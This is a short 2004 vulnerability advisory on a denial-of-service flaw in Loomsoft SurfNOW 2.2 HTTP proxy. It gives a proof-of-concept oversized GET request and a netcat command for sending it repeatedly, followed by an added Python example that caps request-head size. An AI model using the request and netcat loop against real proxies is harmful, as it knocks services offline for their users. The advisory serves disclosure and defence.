
Denial of Service Vulnerability in Loomsoft SurfNow! HTTP Proxy

Reported January 29, 2004 by Donato Ferrante.

 

 

VERSIONS AFFECTED

 

  • Loom Software's SurfNOW 2.2 and earlier

 

DESCRIPTION

 

Loom Software's SurfNOW 2.2 and earlier contains a Denial of Service (DoS) vulnerability. This vulnerability is a result of a flaw in the way SurfNOW handles long HTTP headers.

 

DEMONSTRATION

 

The discoverer posted the following code as proof of concept:

 

GET \aaaaaaaaaaaaa[ 490 kb of a ]aaaa HTTP/1.1\n\n\n

NOTE: 490Kb of the character 'a' is being sent.

It is also possible to test this bug with NetCat, run repeatedly:

nc -v -v host 8080 < testFile.txt
(note: "testFile.txt" is a file of 490 Kb as in [1])
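
On the defensive side, a proxy front end can cap the request line and the total header size while bytes are still arriving, and answer 414 or 431 instead of buffering a request like the one above. This is an added example, not code from the advisory or from Loom Software; the class and function names and both limits are assumptions.

```python
# Added illustration, not code from the advisory or from SurfNOW.
# Both limits are assumed values chosen for the example.
MAX_REQUEST_LINE = 8 * 1024   # cap on "METHOD target VERSION"
MAX_HEAD_BYTES = 32 * 1024    # cap on request line plus all header fields


class RequestTooLarge(Exception):
    def __init__(self, status):
        super().__init__(status)
        self.status = status      # HTTP status to send before closing


class HeadReader:
    """Buffers client bytes until the blank line that ends the request head."""

    def __init__(self):
        self.buf = bytearray()

    def feed(self, chunk):
        """Add one recv() chunk; return the head once complete, else None."""
        self.buf += chunk
        eol = self.buf.find(b"\n")
        first_line_len = eol if eol != -1 else len(self.buf)
        if first_line_len > MAX_REQUEST_LINE:
            raise RequestTooLarge(414)        # URI Too Long
        # Accept CRLF CRLF and the bare LF LF used in the advisory's request.
        ends = [i + len(sep) for sep in (b"\r\n\r\n", b"\n\n")
                if (i := self.buf.find(sep)) != -1]
        end = min(ends) if ends else len(self.buf)
        if end > MAX_HEAD_BYTES:
            raise RequestTooLarge(431)        # Request Header Fields Too Large
        return bytes(self.buf[:end]) if ends else None


def handle(chunks):
    """Feed chunks to a HeadReader; return (status, bytes read before deciding)."""
    reader, seen = HeadReader(), 0
    for chunk in chunks:
        seen += len(chunk)
        try:
            if reader.feed(chunk) is not None:
                return 200, seen
        except RequestTooLarge as exc:
            return exc.status, seen
    return 400, seen                          # peer closed before the head ended
```

Because the check runs on every chunk, the connection is rejected after roughly one limit's worth of data rather than after the full 490 Kb has been held in memory.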

 

VENDOR RESPONSE

 

Loom Software has been notified.

 

CREDIT

 

Discovered by Donato Ferrante.
